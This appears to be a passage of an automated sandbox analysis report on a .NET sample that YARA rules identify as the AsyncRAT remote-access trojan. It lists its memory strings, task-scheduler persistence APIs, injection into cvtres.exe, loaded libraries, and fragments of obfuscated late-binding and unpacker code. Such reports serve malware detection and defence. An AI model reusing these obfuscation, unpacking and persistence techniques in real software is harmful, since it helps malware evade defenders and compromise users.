Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.000000000295B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.000000000295B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1648896271.00000000006EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.00000000037C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBrnuhepyot.dll" vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBrnuhepyot.dll" vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.00000000040E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002609000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient69.exe4 vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000000.1628006059.0000000000112000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedisc.exe^ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1657555936.0000000004430000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe	Binary or memory string: OriginalFilenamedisc.exe^ vs KjCBSM7Ukv.exe

Source: KjCBSM7Ukv.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, E82QoNmOZf4HIIO7HiT6rnL8gaPd4gt0PHOeqpPWp8SJWRqcriTPoZ8MmcOcvvlKl0bXiJNYBd7C70.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, ICNhUEC49XYePafhHkU9bNM74HFLRmpWda3g4FlCDSetuYw9rAjWICE3BOqjQyOJKckJ79LNQ2mCW4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, ICNhUEC49XYePafhHkU9bNM74HFLRmpWda3g4FlCDSetuYw9rAjWICE3BOqjQyOJKckJ79LNQ2mCW4.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, Lof5uhYcyFa0fioPYjKPe99cqLRTqzxK8RWKufv2mhMg2yKOdlgd1RBJbAkO4QLvObNqtKI8efoDiLDVG14Z07NKOIjFM.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, Lof5uhYcyFa0fioPYjKPe99cqLRTqzxK8RWKufv2mhMg2yKOdlgd1RBJbAkO4QLvObNqtKI8efoDiLDVG14Z07NKOIjFM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/6@2/2

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KjCBSM7Ukv.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\eqLVKldUxQjNG8e8

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c411a00f-13c8-4a21-8d29-c6fba7f78b72

Jump to behavior

Source: KjCBSM7Ukv.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: KjCBSM7Ukv.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KjCBSM7Ukv.exe

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Users\user\Desktop\KjCBSM7Ukv.exe "C:\Users\user\Desktop\KjCBSM7Ukv.exe"
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 1668
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: KjCBSM7Ukv.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: KjCBSM7Ukv.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1652553493.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002609000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1657555936.0000000004430000.00000004.08000000.00040000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1652553493.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002609000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1657555936.0000000004430000.00000004.08000000.00040000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: protobuf-net.pdb source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.pdbH source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Core.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER40FF.tmp.dmp.4.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BmbcNrp9UKDIVUXMDLIMRgdU6CWuOqCWzbQECkn78bNMFxwsPPgnTiGV9WQ7Tb6xuGgbkHFaCFja9nJFqeUQwrunePyOH.WSVyfM0ChJOVLpU9fMrrRVS0Cv5ZipxF3pO9rhwZDcS3b94RAdFGFtbB6zFdnPZP0xAnL2coNlG3lZbXczAYO0BXlW0LN,BmbcNrp9UKDIVUXMDLIMRgdU6CWuOqCWzbQECkn78bNMFxwsPPgnTiGV9WQ7Tb6xuGgbkHFaCFja9nJFqeUQwrunePyOH.kWBR6coCFSFhmQlzA1hS4AfR6makW3DGrLYcNuoElwbWKIpdsdJVB2nLwTo3JIOLmfukMWn3zXvq9hewFtQmN2FXebRRs,BmbcNrp9UKDIVUXMDLIMRgdU6CWuOqCWzbQECkn78bNMFxwsPPgnTiGV9WQ7Tb6xuGgbkHFaCFja9nJFqeUQwrunePyOH.Sm0mG6RUiRc82r3rat7Uhndwu6MRhdFqruADkC4P8agtaJZIJFT90XqKlTeFCZLGuXP9c2U7pJTxE2SJ6K5IKUcozC1wi,BmbcNrp9UKDIVUXMDLIMRgdU6CWuOqCWzbQECkn78bNMFxwsPPgnTiGV9WQ7Tb6xuGgbkHFaCFja9nJFqeUQwrunePyOH._4FVvlxj1muJ2j2gT5gTardfNJPjWRt5FPmRF6eD3TK4UlnI4sMtIqt6G2rBrz3lglCaXes9DLAlHNtUa4oloHvtjaxUHW,ICNhUEC49XYePafhHkU9bNM74HFLRmpWda3g4FlCDSetuYw9rAjWICE3BOqjQyOJKckJ79LNQ2mCW4.WjkwG2AtdYKMwyDHETQcn9iKIlPBAgxbKuxoM8f1iCsewsYNtwW8EB1PleOpyAVFPvbZB2sOhTg3r8()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hf5fbF5zMruJfnJSzvuy4Kn5nZCesPXn6aT9mkANIePnc8e63xC5wu0bUSIfFgzlT6Ss7LIh3YA3Ng[2],ICNhUEC49XYePafhHkU9bNM74HFLRmpWda3g4FlCDSetuYw9rAjWICE3BOqjQyOJKckJ79LNQ2mCW4.uru4pkMCStCbBsHEzDkpsE9qnv7FC49npd3yi7IGqH4OLXtUKs9cKdR8LCS6N9Gq1eJXDAZVixQeTJ(ICNhUEC49XYePafhHkU9bNM74HFLRmpWda3g4FlCDSetuYw9rAjWICE3BOqjQyOJKckJ79LNQ2mCW4.lTIoKCtp9nNfGKgNpnK9w7oAnbhuHqe4T3TEv7r0qxFPmCpsdBNKELrSBbiESrMppYfN4WfxHinurm(hf5fbF5zMruJfnJSzvuy4Kn5nZCesPXn6aT9mkANIePnc8e63xC5wu0bUSIfFgzlT6Ss7LIh3YA3Ng[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hf5fbF5zMruJfnJSzvuy4Kn5nZCesPXn6aT9mkANIePnc8e63xC5wu0bUSIfFgzlT6Ss7LIh3YA3Ng[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: KjCBSM7Ukv.exe, Program.cs	.Net Code: PerformComplexCalculation System.AppDomain.Load(byte[])
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.KjCBSM7Ukv.exe.5a90000.13.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.KjCBSM7Ukv.exe.5a90000.13.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.KjCBSM7Ukv.exe.5a90000.13.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.KjCBSM7Ukv.exe.5a90000.13.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.KjCBSM7Ukv.exe.5a90000.13.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.KjCBSM7Ukv.exe.4110298.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	.Net Code: RoOwIgv14BDSo8hGtE9pEEFolIBstnU9h01jfvlBjC3VQm6mOJgWIQpjGZz9g80svnJ4fJiI7bG7Qp0h8LjfMR3JVOZ8Q System.AppDomain.Load(byte[])
